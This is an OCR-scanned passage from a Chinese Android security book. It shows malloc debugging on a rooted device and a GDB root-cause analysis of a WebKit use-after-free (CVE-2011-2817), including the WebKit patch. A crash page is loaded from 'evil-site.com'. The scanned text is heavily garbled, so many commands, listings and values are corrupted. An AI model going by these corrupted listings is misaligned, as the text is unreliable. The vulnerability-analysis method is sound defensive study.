467 InitMalloc(&gMallocUse, debug_level, "gqemu_instrumented"); 
468 break; 























这 个 文件 开头 有 一 条 注释 ,解释 了 每 种 策略 的 用 途 ; 但 是 第 4 个 选项 qemu_instrumented 
除外 ， 因 为 这 个 选项 是 在 模拟 器 内 实现 的 。 


























7.9 ”漏洞 分 析 195 
262 * 1 - For memory leak detections. 
263 * 5 - For filling allocated / freed memory with patterns defined by 
264 党 CHK_SENTINEL_ VALUE, and CHK_FILIL_FREE macros . 
265 * 10 - For adding pre-, and post- allocation stubs in order to detect 
2.66” 这 buffer overruns. 
设置 相关 属性 需要 root 权限 ， 还 需要 将 1ibc_malloc_debug_leak.so 库 放 人 /systenylib 














目录 ， 这 要 暂时 将 /system 0 卖 写 模式 。 这 个 动态 库 位 于 AOSP 编译 输出 的 
out/target/product/maguro/obj/lib 目录 下 。 下 面 的 片段 展示 了 整个 配置 过 程 : 


dev:~/android/source $ aqb push \ 
out/target/product/maguro/obj/lib/libc malloc debug_leak.so /data/local/tmp 
587 KB/s (265320 pytes in 0.440s) 

dev:~/android/source $ adb shell 

shell@maguro:/ $ su 

root@maguro:/ # mount -o remount,rw /system 

root@maguro:/ # cat /data/local/tmp/libc malloc debug_leak.so > \ 
/system/lib/libc malloc debug_leak.so 

root@maguro:/ # mount -Oo remount,ro /system 

root@maguro:/ # setprop libc.debug.malloc 5 

root@maguro:/ # cd /data/local/tmp 

root@maguro:/data/local/tmp # ps | grep system server 

system 3.79 12.5. 623500 99200 ffffffff 40199304 S system server 
root@maguro:/data/local/tmp # kill -9 379 
root@maguro:/data/local/tmp # logcat -d | grep -i debug 

















I/libc ( 2994): /system/bin/bootanimation: using libc.debug.malloc 5 
CE 直下 二 
DE ( 2999): /system/pbin/netd: using libc.debug.malloc 5 (fill) 
/LibG ( 3001): /system/bin/iptables: using libc.debug.malloc 5 (fill) 
LILiDe ( 3002): /system/bin/ip6tables: using libc.debug.malloc 5 (fill) 
TLDG ( 3003): /system/bin/iptables: using libc.debug.malloc 5 (fill) 
I/libc ( 3004): /system/bin/ip6tables: using libc.debug.malloc 5 (fill) 
下 大 LOG ( 3000): /system/bin/app_process: using libc.debug.malloc 5 
(£1i11) 

过 








可 惜 的 是 ,在 Android 4.3 上 用 这 个 调试 工 


具 来 测试 一 些 人 \ 开 漏洞 的 效果 并 不 好 。 和 希望 这 个 





情况 能 在 未 来 的 Android 版 本 中 得 到 改善 。 无 论 如 何 ， 
调试 工具 打下 了 基础 。 

监视 点 

监视 点 〈watchpoint ) 是 一 种 特殊 的 断 点 ， 在 
x64 平 台 上 的 监视 点 通过 硬件 断 点 来 实现 ， 在 发 生 内 存 记 
































这 个 调试 工具 至 少 为 未 来 构造 更 稳定 的 堆 


人 指定 内 存 发 生菜 种 操作 时 才 会 被 触发 。x86 与 





卖 写 操作 时 通知 研究 人 员 。 不 六 的 是 ， 大 


多 数 ARM 处 理 器 没有 实现 硬件 断 点 ， 但 是 在 ARM 平台 上 可 以 用 软件 来 实现 监视 点 ， on 


的 功能 。 然而， 因为 软件 依赖 于 单 步 运 行 ， 
们 来 追踪 特殊 变量 值 的 改变 是 非常 有 用 的 。 
假如 研究 人 员 知 道 某 个 对 象 的 成 员 变 

















监视 点 。 继 续 


所 以 软件 监视 


钢 点 非常 慢 ， 成 本 开销 较 大 。 当 然 ， 


量 在 对 象 创建 后 发 生 了 改变 ， 想 知道 代码 在 哪里 有 改 
动 。 首 先 ， 可 以 在 对 象 创建 时 下 一 个 断 点 。 执 行 到 断 点 处 时 ,使 用 GDB 的 watch 命令 
执行 会 发 现 速度 变 慢 了 很 多 。 当 程序 修改 变量 值 后 ， 





创建 一 个 
GDB 会 在 修改 后 的 下 一 条 指 
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令 处 暂停 。 这 种 技术 可 以 帮助 研究 人 员 成 功 定位 代码 位 置 。 
断 点 
能 够 创建 新 断 点 的 断 点 是 非常 强大 的 工具 , 也 被 称 作 互相 依赖 的 断 点 。 它 最 重要 的 用 处 是 消 
除 噪 音 。 假 设 在 函数 main_event_loop 调用 时 发 生 了 推 内 存 破坏 (如 函数 名 所 示 ,， 这 个 函数 会 
被 频繁 调用 )， 要 明白 问题 的 根源 ， 需 要 理解 在 内 存 破坏 发 生 时 程序 正在 处 理 哪 些 内存 块 。 如 果 
在 main_event_loop 上 设置 一 个 断 点 ,执行 就 会 不 停 地 被 打 断 。 如 果 人 研究 人 员 知 道内 存 破 坏 源 
自 某 个 特定 的 输入 ,并 且 知 道 哪些 代码 负责 处 理 相 应 的 输入 ,就 可 以 在 那 插 入 一 个 断 点 。 当 断 点 
被 命中 时 ,就 可 以 在 main_event_loop 上 再 设置 一 个 断 点 。 如 果 运 气 比 较 好 ,首次 命中 的 新 断 
点 就 是 朋 省 发 生 的 调用 点 。 前 面 那些 没有 引发 内 存 破 坏 的 所 有 成 功 调用 都 被 忽略 (并 且 没有 额外 
性 能 开销 )。 在 这 个 样 例 场景 下 ， 使 用 互相 依赖 的 断 点 可 以 帮助 分 析 人 员 缩 小 内 存 破 坏 的 发 生 范 
围 。 下 面 介绍 一 个 类 似 的 场景 。 
2. 分 析 WebKit 月 省 
分 析 漏 洞 的 起 源 是 一 个 迭代 的 过 程 。 要 想 跟踪 一 个 漏洞 ,通常 需要 多 次 运行 崩溃 的 测试 样 例 。 
尽管 可 以 把 调试 器 附加 到 进程 上 , 但 这 样 并 不 能 马上 了 解 问题 的 根源 。 向 后 追溯 数据 流 和 控制 流 
(包括 过 程 间 的 控制 流 ) 才 是 问题 的 核心 所 在 。 
下 面 研究 一 个 能 够 让 搭载 Android 4.3 的 Galaxy Nexus 浏览 器 崩溃 的 HTML 文件 作为 演示 。 
有 趣 的 是 ，Android 上 的 稳定 版 和 beta 版 Chrome 都 不 受 影响 。 我 们 使 用 本 章 前 面 介绍 的 一 些 技 
术 和 调试 方法 来 找到 骨 溃 的 根源 。 
让 浏览 器 反复 骨 溃 几 次 ， 然 后 查看 tombstone 文件 会 很 有 帮助 ; 寄存 器 的 值 包含 一 些 有 用 的 
言 息 。 下 面 列 出 了 多 次 加 载 页 面 产生 前 溃 的 情况 : 
root@maguro:/data/tombstones # /data/local/tmp/busybox head -9 * | grep 
5 ip 00000001 sp 5e8003c8 lr 5d46fee5 pc 5a50ec48 cpsr 200e001 
ip 00000001 sp 5ddba3c8 lr 5c865ee5 pc 5e5fc2b8 cpsr 2000001 
ip 00000001 sp 5dedc3c8 lr 5ca4bee5 pc 00000000 cpsr 200f001 
ip 00000001 sp 5dedc3c8 lr 5ca4bee5 pc 60538ad0 cpsr 200e001 
ip 00000001 sp 5e9003b0 lr 5d46fee5 pc 5a90bf80 cpsr 200e001 
ip 00000001 sp 5e900688 lr 5d46fee5 pc 5a518d20 cpsr 200f001 


ip 00000001 sp 5eb00688 lr 5d46fee5 pc 5a7100a0 cpsr 200f001 
ip 00000001 sp 5ea003c8 lr 5d46fee5 pc 5edfa268 cpsr 200f0010 


从 上 面 的 结果 可 以 看 出 ， 每 次 崩 演 的 地 方 都 明显 不 同 。PC 寄存 器 (与 x86 下 的 EIP 类 似 ) 
的 值 都 不 同 ， 而 且 都 很 奇怪 ， 在 很 大 程度 上 表明 这 是 一 个 释放 后 重用 (use-after-free ) 漏洞 。 为 
了 进行 确定 并 了 解 漏洞 产生 的 原因 ， 需 要 继续 深入 分 析 。 

为 了 获得 更 多 信息 ， 需 要 使 用 本 章 开 头 搭建 的 native 层 代码 调试 环境 。 跟 之 前 一 样 ， 在 主机 
上 后 台 运 行 shell 脚本 debugging.sh。 这 个 脚本 会 调用 设备 上 的 shell 脚本 attach.sh, 让 浏览 器 访问 
about:blank 页 面 ， 等 待 一 段 时 间 后 附加 到 GDB 服务 器 上 。 然后 , 在 主机 上 运行 GDB 客户 端 并 加 
载 GDB 脚本 ， 连 接 等 待 着 的 GDB 服务 器 。 


dev:gn-browser-dbg $ arm-eabi-gdb -q -x script.gdb app_process 
dev:~/android/source $ ./debugging.sh & 
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[1] 28994 

dev:gn-browser-dbg $ arm-eabi-gdb -q -x script.gdb app_process 

Reading symbols from /android/source/gn-browser-dbg/app_process...done. 
warning: Could not load shared library symbols for 86 libraries, e.g. libm. 
so. 

Use the "info sharedlibrary" command to see the complete listing. 

Do you need "set solib-search-path" or "set sysroot"? 

warning: Breakpoint address adjusted from 0x40079b79 to 0x40079b78 . 


epoll wait () at bionic/libc/arch-arm/syscalls/epoll wait.S:10 
0 mov 六 Vy 疝 相 ) 

(gdb) cont 

Continuing. 


调试 器 附加 到 进程 上 继续 执行 ， 然 后 打开 导致 朋 溃 的 HTML 页 面 。 就 像 在 attach.sh 脚本 中 
所 做 的 那样 ， 可 以 使 用 am start 命令 让 浏览 器 访问 指定 页 面 。 


shell@maguro:/ $ am start -a android.intent.action.VIEW -d \ 
http://evil-site.com/crashl .html com.google.android.browser 


可 能 需要 多 次 加 载 页 面 才 会 发 生 山 演 。 一 旦 崩 淡 发 生 ， 就 可 以 开始 深入 分 析 了 。 


Program received signal SIGSEGV, Segmentation fault. 
[Switching to Thread 17879] 

0x00000000 in ?? () 

(gdqb) 


浏览 器 崩 演 时 PC 寄存 器 被 置 0 了 ! 这 很 明显 是 一 个 严重 的 错误 。 可 能 造成 这 种 情况 的 因素 
有 很 多 ， 所 以 需要 清楚 确切 原因 
首先 在 调用 栈 寻 找 线索 。 下 面 是 GDB 的 packtrace 命令 产生 的 输出 : 


(gdb) back 
#0 0x00000000 in ?? () 
#1 Ox5d46fee4 in WebCore::Node::parentNode (this=0x5a621088) at 
external/webkit/Source/WebCore/dom/Node.h:731 
#2 0x5d6748e0 in WebCore::ReplacementFragment::removeNode (this=<optimized 
out>, node=...) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 
cpp:215 
#3 0x5d675d5a in WebCore::ReplacementFragment::removeUnrenderedNodes 
(this=0x5ea004a8, holder=0x5a6b6a48) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 
SpD:297 
#4 0x5d675eac in WebCore::ReplacementFragment::ReplacementFragment 
(this=0x5ea004a8, document=<optimized out>, 

fragment=<optimized out>, matchStyle=<optimized out>, selection=...) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 
jo 
#5 Ox5d6764c2 in WebCore::ReplaceSelectionCommand::doApply 
(this=0x5a621800) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 
cpp:819 
#6 0x5d66701c in WebCore::EditCommand::apply (this=0x5a621800) at 
external/webkit/Source/WebCore/editing/EditCommand.cpp:92 
#7 Ox5d66e2e2 in WebCore: :executeInsertFragment (frame=<optimized out>, 
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fragment=<optimized out>) 

at external/webkit/Source/WebCore/editing/EditorCommand.cpp:194 

#8 0x5d66e328 in WebCore: :executeInsertHTML (frame=0x5aa65690, value=...) 
at external/webkit/Source/WebCore/editing/EditorCommand.cpp:492 

#9 0x5d66d3d4 in WebCore::Editor::Command: :execute (this=0x5ea0068c, 
parameter=..., triggeringEvent=0x0) 
at external/webkit/Source/WebCore/editing/EditorCommand.cpp:1644 
#10 Ox5d6491a4 in WebCore::Document::execCommand (this=0x5aalac80, 
commandName=..., userInterface=<optimized out>, value=...) 

at external/webkit/Source/WebCore/dom/Document .cpp:4053 

#11 Ox5d5c7df6 in WebCore::DocumentInternal::execCommandCallback 
(args=<optimized out>) 
at .../libwebcore_intermediates/Source/WebCore/bindings/V8Document. 

COB L473 

#12 Ox5d78dc22 in HandleApiCallHelper<false> (isolate=0x4173c468, args=...) 
总 二 

external/v8/src/builtins.cc:1120 


Ee 
从 中 可 以 看 出 ， 调 用 栈 非 常 完整 ， 里 面 的 一 些 函 数 调用 最 终 导致 了 骨 溃 。 对 于 ARM 架构 ， 
































可 以 通过 查看 LR 寄存 器 的 指向 来 明确 程序 是 如 何 跳 转 到 当前 地 址 的 。 根 据 当前 是 Thumb 模式 还 





是 ARM 模式 ,将 LR 指向 的 地 址 减 去 2 或 4， 然后 dump 内 存 。 如 果 LR 的 值 是 奇数 ， 那 么 这 个 
地 址 一 定 指 向 Thumb 指令 。 


(96) 光 X 浴 ] 让 这 
0x5d46fee3 <WebCore: :Node: :parentNode() const+18>: blx r2 


这 是 一 条 跳 转 到 R2 寄存 器 的 分 支 指令 。 查 看 R2 寄存 器 的 值 可 以 确定 程序 为 何在 0 处 崩溃 。 


(GaB) “二 下 -证 色 
EE 0x0 0 


上 面 的 结果 非常 明显 地 解释 了 为 何 程序 在 月 江 的 时 候 到 达 了 地 址 0。 
这 当然 还 不 是 最 终 原 因 ， 所 以 要 继续 向 后 追踪 数据 流 ， 查 看 R2 为 什么 变 成 了 0。 分 支 语句 
































跳 转 到 0 显然 是 不 正常 的 ， 所 以 继续 查看 调用 函数 的 反 汇 编 。 





(gdb) up 
#1 Ox5d46fee4 in WebCore::Node::parentNode (this=0x594134b0) at 
external/webkit/Source/WebCore/dom/Node.h:731 


731 return getFlag(IsShadowRootFlag) || isSVGShadowRoot() ? 0 
parent () ; 
(gdb) disas 
Dump of assembler code for function WebCore::Node::parentNode() const: 
0x5d46fed0 <+0>: push {本 -下 
0x5d46fed2 <+2>: mov 5 站 间 
Ox5d46fed4 <+4>: lgdr r3, [r0, #36] ; Ox24 
Ox5d46fed6 <+6>: lsls i de 
0x5d46fed8 <+8>: bpl.n Ox5d46fede <WebCore::Node::parentNode()const+14> 
Ox5d46feda <+10>: movs r0, #0 
0x5d46fedc <+12>: pop {De 
Ox5d46fede <+14>: QT 次 1 | 生 05 淋 的 
Ox5d46fee0 <+16>: lar r2, [rl, #112] ; Ox70 


Ox5d46fee2 <+18>: blx 2 
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=> Ox5d46fee4 <+20>: cmp r0, #0 
Ox5d46fee6 <+22>: bne.n Ox5d46feda <WebCore::Node::parentNode()const+10> 
0x5dq46fee8 <+24>: lgdr r0, [r4, #12] 
Ox5d46feea <+26>: pop {ry DE} 


End of assembler dump. 

这 个 反 汇 编列 表 展示 了 一 个 较 短 的 函数 ， 其 中 包含 了 跳 转 到 R2 的 分 支 语句 。 这 个 函数 并 没 
有 接收 任何 参数 ， 所 以 整个 执行 过 程 只 依赖 于 对 象 的 成 员 。 向 后 分 析 可 以 看 到 ，R2 的 值 是 从 R1 
指向 的 内 存 偏 移 112 处 取 到 的 , 而 R1 又 是 从 R0 指向 的 内 存 偏 移 0 处 取 到 的 。 现 在 确认 一 下 是 否 
是 这 些 内 存 使 R2 变 为 0。 


(可 站 的 六 洒 下 这 于 

到 下 0x5a621fa0 1516380064 
(gdb) x/wx Sr1 + 112 

0x5a622010: 0x00000000 

(gdb) x/wx ST0 

0x5a621088: 0x5a621fa0 


确认 了 ! 可 以 肯定 0x$a621fa0 或 者 0x5a621088 的 内 存 块 出 了 问题 。 继 续 检查 这 些 内 存 块 是 
被 释放 状态 还 是 被 使 用 状态 ， 只 需 查 看 0x5a621088 处 内 存 块 的 头 部 即 可 。 


(gdb) x/2wx S$r0 - 0x8 
0x5a621080: 0x00000000 0x00000031 


查看 第 二 个 32 位 的 值 ， 它 对 应 于 当前 内 存 块 的 大 小 ， 最 低 三 位 是 标志 位 。 第 二 位 标志 位 为 
0 说 明 当 前 内 存 块 是 释放 状态 ! 所 以 可 以 肯定 ， 这 是 一 个 释放 后 重用 漏洞 。 

接 下 来 , 要 知道 这 个 内 存 块 是 在 哪里 被 释放 的 。 退 出 调试 器 , 跟 之 前 一 样 , 再 次 让 进程 前 省 。 
让 shell 脚本 debugging.sh 开始 等 待 ， 然 后 启动 浏览 句 ， 接 下 来 用 GDB 服务 器 附加 到 进程 。 




















































































































注意 ”对 话 框 会 间断 性 地 出 现 ， 来 询问 是 否 要 继续 等 待 浏览 器 响应 。 这 是 正常 现象 ， 因 为 调试 
器 让 浏览 器 停止 了 执行 。 只 需要 点 击 等 待 (Wait ) 按钮 (或 者 就 忽略 对 话 框 ) 即 可 。 


当 浏 览 器 再 次 启动 时 , 用 GDB 客户 端 连 接 GDB 服务 器 。 这 次 , 在 调用 函数 中 设置 一 个 用 于 
追踪 的 断 点 ， 赶 在 骨 省 之 前 与 调试 顺 进 行 交 互 : 


(gdb) break 'WebCore::Node::parentNode() const' 

Breakpoint 1 at Ox5d46fed2: file external/webkit/Source/WebCore/dom/Node.h, 
line 730. 

(gdb) commands 

Type commands for breakpoint(s) 1, one per line. 

End with a line saying just "end". 

>cont 

>end 

(gdb) cont 

Continuing. 


不 幸 的 是 ， 你 会 很 快 发 现 这 个 断 点 被 命中 得 过 于 频繁 了 。 这 是 因为 WebKit 代码 里 的 很 多 地 
方 都 调用 了 parentNode 函数 。 为 了 解决 这 个 问题 ， 在 更 上 一 层 的 函数 中 下 一 个 断 点 。 
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(gdb) break \ 

'WebCore: :ReplacementFragment: :removeNode (WTF: :PassRefPtr<WebCore: :Nodqe>) 
Breakpoint 1 at 0x5d6748d4: file 
external/webkit/Source/WebCore/editing/ReplaceSelectionCommand.cpp, line 


ZE 
(gdb) cont 
Continuing. 


设置 断 点 之 后 ， 再 次 载 人 引发 衣 演 的 页 面 。 


[Switching to Thread 18733] 
Breakpoint 1, WebCore::ReplacementFragment::removeNode (this=0x5ea004a8, 


node=...) 
at external/webkit/Source/WebCore/editing/ReplaceSelectionCommangd. 
GBB: 2Tt 
211 { 
(gdb) 




















让 程序 在 崩 演 前 停止 ,通过 创建 一 个 用 来 追踪 的 断 点 ， 就 能 够 知道 free 函数 是 在 哪里 被 调 
用 的 了 。 为 了 减少 和 干扰， 可 以 把 断 点 限制 在 当前 线程 中 ,但 是 需要 事先 知道 当前 的 线程 号 


(gdb) info threads 














站 这 Thread 18733 WebCore: :ReplacementFragment: :removeNode 
(this=0x5e9004a8, node=...) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommangd. 
GBB:211 


现在 知道 了 当前 的 线程 号 是 2, 创建 这 个 线程 下 的 断 点 ， 然 后 设置 一 个 在 断 点 命中 时 执行 一 
些 列 命令 的 脚本 。 


(gdb) break dqlfree thread 2 

Breakpoint 2 at 0x401259e2: file 
bionic/libc/bionic/../upstream-dlmalloc/malloc.c, line 4711. 
(gdb) commands 

Type commands for breakpoint(s) 2, one per line. 
End with a line saying just "end". 

>silent 

>printf "free(O0x%x)\n", S$r0 

>back 

SPELTEfE, x Nn 

>cont 

>end 

(gdb) cont 

Continuing. 


继续 执行 后 ,就 能 立刻 看 到 断 点 命中 时 的 输出 了 。 在 浏览 器 再 次 崩溃 之 前 ,无需 过 于 关注 这 
些 输 出 。 











注意 在 崩溃 之 前 ,只 需要 告诉 浏览 器 继续 执行 一 次 。 如 果 调 试 器 在 此 过 程 中 发 生 了 多 次 停顿 ， 
那么 最 好 杀 掉 浏览 器 进程 并 再 次 尝试 。 通过 编写 script.gdb 脚本 来 完成 整个 步骤 会 让 重启 
整个 过 程 变 得 不 那么 麻烦 。 
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当 浏览 器 再 次 前 省， 查看 RO 中 的 值 : 


(gabY) 1 ££0 
r0 0x5a6a96d8 1516934872 


然后 向 前 查找 调试 器 的 输出 ， 找 到 哪个 free 释放 了 这 个 地 址 处 的 内 存 块 。 


free (0x5a6a96dq8) 
0 dlfree (mem=0x5a6a96d8) at 
bionic/libc/bionic/../upstream-dlmalloc/malloc.c:4711 
1 0x401229c0 in free (mem=<optimized out>) at 
bionic/libc/bionic/malloc_debug_common.cpp:230 
2 0x5d479b92 in WebCore: :Text: :~Text (this=0x5a6a96d8, __in_ 
chrg=<optimized 
out>) at external/webkit/Source/WebCore/dom/Text.h:30 
3 0x5d644210 in WebCore::removeAllChildrenInContainer<WebCore::Node, 
WebCore: :ContainerNode> (container=<optimized out>) 

at external/webkit/Source/WebCore/dom/ContainerNodeAlgorithms.h:64 
4 0x5d644234 in removeAllChildren (this=0x5a8d36f0) at 
external/webkit/Source/WebCore/dom/ContainerNode.cpp:76 
5 WebCore::ContainerNode::~ContainerNode (this=0x5a8d36f0, 
__in chrg=<optimized out>) 
external/webkit/Source/WebCore/dom/ContainerNode.cpp:100 
6 0x5d651890 in WebCore::Element::~Element (this=0x5a8d36f0, 
in_chrg=<optimized out>) 
at external/webkit/Source/WebCore/dom/Element .cpp:118 
7 0x5d65c5b4 in WebCore::StyledElement::~StyledElement (this=0x5a8d36f0, 
in_chrg=<optimized out>) 
at external/webkit/Source/WebCore/dom/StyledElement .cpp:121 
8 0x5d486830 in WebCore: :HTMLElement::~HTIMLElement (this=0x5a8d36f0, 
__in chrg=<optimized out>) 
at external/webkit/Source/WebCore/html/HTMLElement .h:34 
9 0x5d486848 in WebCore: :HTMLElement::~HTIMLElement (this=0x5a8d36f0, 
in_chrg=<optimized out>) 
at external/webkit/Source/WebCore/html/HTMLElement .hn:34 
10 Ox5d46fb9a in WebCore: :TreeSharedq<WebCcore: :ContainerNode>: :removedLast 
Ref 
(this=<optimized out>) 
at external/webkit/Source/WebCore/platform/TreeShared.h:118 
11 Ox5d46aef0 in deref (this=<optimized out>) at 
xternal/webkit/Source/WebCore/platform/TreeShared.h:79 
12 WebCore: :TreeShared<WebCore: :ContainerNode>::deref (this=<optimized 
U 


由 
全 





















































out>) 
at external/webkit/Source/WebCore/platform/TreeShared.h:68 

13 Ox5d46f69a in ~RefPtr (this=0x5e9003e8, __in chrg=<optimized out>) at 
external/webkit/Source/JavaScriptCore/wtf/RefPtr.h:58 

14 WebCore: :Position::~Position (this=0x5e9003e8, __in_ chrg=<optimized 
out>) 
at external/webkit/Source/WebCore/dom/Position.h:52 

15 Ox5d675d60 in WebCore::ReplacementFragment::removeUnrenderedNodes 
(this=0x5e9004a8, holder=0x5a6c5fe0) 


找到 了 ! 从 上 面 的 结果 可 以 看 到 ， 内 存 块 是 被 Webcore: :Text 对 象 的 析 构 函数 所 释放 。 进 
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一 步 仔 细 查 看 调用 栈 可 以 发 现 ， 有 一 个 缓冲 区 在 删除 HTML 元 素 containerNode 的 所 有 子 节 
点 时 被 释放 ， 这 发 生 在 第 一 次 调用 removeNode 的 时 候 ， 即 最 初 放置 断 点 的 地 方 。 检 查 
removeNode 第 二 次 调用 时 的 node 参数 , 可 以 看 到 这 个 指针 被 传 了 进来 , 而 这 原本 不 应 该 发 生 。 

到 现在 为 止 , 已 经 确定 了 这 是 一 个 释放 后 重用 漏洞 , 但 是 仍然 没有 找到 问题 的 根源 。 为 了 解 
决 这 个 问题 , 需要 进一步 探索 调用 栈 , 带 着 怀疑 的 态度 去 分 析 程 序 在 哪里 发 生 了 错误 。 把 注意 力 
集中 在 调用 removeNode 的 函数 = moveUnrenderedNodes 上 。 这 个 函数 的 代码 如 下 : 


287 void ReplacementFragment::removeUnrenderedNodes (Node* holder) 





























288 { 

289 Vector<Node*> unrendered; 

290 

291 for (Node* node = holder->firstChild(); node; 
node = node->traverseNextNode (holder)) 

292 if (!isNodeRendered(node) && !isTableStructureNode (node)) 

293 unrendered.append (node); 

294 

295 size_t n = unrendered.size(); 

296 for (size t i = 0; i < n; ++i) 

297 removeNode (unrendered[i]); 

298 } 


在 这 个 函数 中 ， 第 291 行 的 循环 使 用 了 traverseNextNode 方法 来 遍历 传人 的 Node 对 象 
子 节 点 。 对 于 每 一 个 子 节点 ， 循 环 内 的 代码 将 非 表 结构 的 节点 和 未 泻 染 的 节点 添加 到 
unrendered 容器 (Vector ) 中 。 接 下 来 ,在 第 296 行 的 循环 中 处 理 所 有 未 演 染 的 节点 对 象 。 

第 一 次 调用 removeNode 的 时 候 程序 很 可 能 是 正常 的 ， 而 第 二 次 调用 的 时 候 使 用 了 一 个 已 
经 释放 的 指针 。 目 前 除了 知道 释放 发 生 的 位 置 和 在 哪里 使 用 了 释放 后 的 内 存 块 以 外 , 我 们 还 通过 
dlfree 的 调用 栈 知 道 , removeNode 函数 会 删除 所 有 传人 的 containerNogde 子 节点 。 我 们 依然 
不 清楚 问题 的 根源 ,不 确定 是 什么 导致 了 释放 后 重用 。 问 题 似 乎 不 太 可 能 发 生 在 isNodeRendered 
和 isTableStructureNode 水 数 中 ， 剩 下 的 函数 就 只 有 traverseNextNode 了 。 这 个 函数 的 
源 代码 如 下 所 示 : 




































































1116 Node* Node::traverseNextNode(const Node* stayWithin) const 
二 江 工 卫生 
1118 jf flrst ChiEde)) 
T1119 return firstChild(); 
二 二 这 入 if' "(thie ss, StayvWitl) 
E22 return 0; 
1122 if (nextSibling()) 
1123 return nextSibling(); 
1124 const Node *n = this; 
生出 久生 while (n && In->nextSibling() && (!stayWithin || 
n->parentNode() != stayWithin)) 
1126 n = n->parentNode(); 
多 了 if (n) 
1128 return n->nextSibling(); 
.2.9 return 0; 
L130: 
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会 包含 所 有 未 泻 染 的 节点 及 其 子 节点 。 正 因为 如 此 ， 当 removeNode 第 一 次 返回 时 ， 
unrenderered 容器 中 会 包含 第 一 个 节点 中 已 经 删除 的 子 节点 。 
可 以 通过 查看 第 一 次 调用 removeNode 时 unrendered 容 右 的 状态 来 验证 这 个 想法 。 


Breakpoint 1, WebCore::ReplacementFragment::removeNode (this=0x5ea004a8, 
node=...) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 
GD 
之 二 于 人 
(gdb) up 
#1 0x5d675d5a in WebCore::ReplacementFragment::removeUnrenderedNodes 
(this=0x5ea004a8, holder=0x5ab3e550) 

at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 


























cpp:297 

297 removeNode (unrendered[i]); 
(gdb) p/x n 

$1 = 0x2 


(gdb) x/2wx unrendered.m buffer.m buffer 
0x6038d8b8: 0x5edbf620 0x595078c0 


可 以 看 到 有 两 个 条 目 指向 Node 对 象 , 分 别 是 0x5edbf620 和 0x595078c0。 查 看 这 些 Node 
对 象 的 内 容 就 能 知道 它们 的 关联 ， 尤 其 是 第 一 个 节点 是 否 为 第 二 个 节点 的 父 节 点 。 


(gdb) p/x *(Node *)0x5edbf620 
$2 = { 





m parent = 0x5ab3e550 
(gdb) p/x *(Node *)0x595078c0 


m parent = Ox5edbf620 





} 
(gdqb) 


答案 是 肯定 的 ! 可 以 到 此 为 止 了 , 但 是 为 了 确定 这 个 结论 ,还 需要 继续 跟踪 这 两 个 对 象 ( 直 
到 崩溃 ) ee 
可 以 看 到 容器 中 的 第 二 个 条 目 有 一 个 m_parent 域 已 经 被 释放 了 。 在 dlfree 人 处 下 一 个 断 点 。 
这 一 次 ， 让 GDB 显示 通 人 然后 让 程序 继续 自动 执行 。 


(gdb) break dlfree thread 2 

Breakpoint 2 at 0x401259e2: file 
bionic/libc/bionic/../upstream-dlmalloc/malloc.c, 
line 4711. 

(gdb) commands 

Type commands for breakpoint(s) 2, one per line. 
End with a line saying just "end". 

>cont 




















第 1118 行 和 1119 行 最 能 说 明 原 因 。 这 个 函数 会 递归 遍历 子 节 点 , 因此 unrendered 容 兢 中 
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>end 
(gdb) cont 
Continuing. 


Lag 
Breakpoint 2, dlfree (mem=0x595078c0) at 
bionic/libc/bionic/../upstream-dlmalloc/malloc.c:4711 
| 
Breakpoint 2, dlfree (mem=0x5edbf620) at 
bionic/libc/bionic/../upstream-dlmalloc/malloc.c:4711 


[| 


可 以 再 次 看 到 这 两 个 指针 被 释放 。 第 一 次 调用 释放 了 子 节点 ,第 二 次 调用 释放 了 第 
接 下 来 ， 原 本 在 removeNode 处 的 断 点 会 被 命中 。 








Breakpoint 1, WebCore::ReplacementFragment::removeNode (this=0x5ea004a8, 


node=...) 
at external/webkit/Source/WebCore/editing/ReplaceSelectionCommand. 

CBB:2L1 
211 { 
(gdb) p/x node 
$4 = { 

nt es "0x95078c60 
} 




















人 


Wo 


最 后 ,确认 传人 removeNode 的 节点 确实 是 已 经 释放 的 子 节 点 。 如 果 继 续 执行 ， 就 会 有 未 





定义 的 行为 发 后， 因为 将 对 已 经 释放 的 对 象 进行 操作 。 
所 以 这 个 问题 的 根源 是 removeNode 和 removeUnrenderedNodes 也 数 在 删除 
了 所 有 的 子 节点 。 那 么 应 该 如 何 修复 这 个 问题 呢 ? 











节点 时 遍历 


修复 这 个 漏洞 的 方式 有 很 多 。 事 实 上 ， 该 漏洞 已 经 被 WebKit 开发 者 修复 ， 并 且 赋 予 编号 
CVE-2011-2817。Android 中 还 存在 这 个 漏洞 其 实 是 个 足 漏 , 可 能 是 由 于 谷歌 对 于 安全 优先 级 定义 




















的 差异 造成 的 。WebKit 开 发 者 官方 推出 的 补丁 如 下 : 


diff --git a/Source/WebCore/editing/ReplaceSelectionCommand.cpp 
b/Source/WebCore/editing/ReplaceSelectionCommand.cpp 

index d41b0897..8670dfb 100644 

--- a/Source/WebCore/editing/ReplaceSelectionCommand.cpp 

+++ b/Source/WebCore/editing/ReplaceSelectionCommand.cpp 

@@ -292,7 +292,7 @@ 





void ReplacementFragment::removeUnrenderedNodes (Node* holder) 
{ 
一 Vector<Nodqex> unrendered; 
十 Vector<RefPtr<Nodqe> > unrendered; 


for (Node* node = holder->firstChild(); node; 
node = node->traverseNextNode (holder)) 
if (!isNodeRendered(node) && !isTableStructureNode (node)) 




















上 上面 的 补 了 修改 了 unrendereqd 容器 的 声明 ， 让 它 成 为 一 个 引用 计数 的 指针 ， 而 不 是 之 前 
的 原始 指针 。 虽 然 这 个 修复 可 以 避免 释放 后 重用 漏洞 ， 但 是 还 有 一 种 更 加 高 效 的 方法 。 
traverseNextSibling 国 数 实现 了 和 traverseNextNode 同样 的 行为 ,除了 一 个 关键 的 差异 : 
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前 者 并 不 遍历 子 节点 。 因 为 子 节点 会 在 removeNode 中 删除 ， 所 以 这 个 函数 更 加 适用 于 这 个 情 
形 。 这 样 unrendered 容器 就 不 会 包含 这 些 待 删除 的 子 节点 ， 从 而 避免 了 释放 后 重用 漏洞 。 





7.9.2 判断 漏洞 可 利用 性 


分 析 清 楚 漏洞 产生 的 原因 后 , 下 一 个 目标 是 判断 利用 这 个 漏洞 的 难度 。 不 管 最 终 的 目标 是 修 
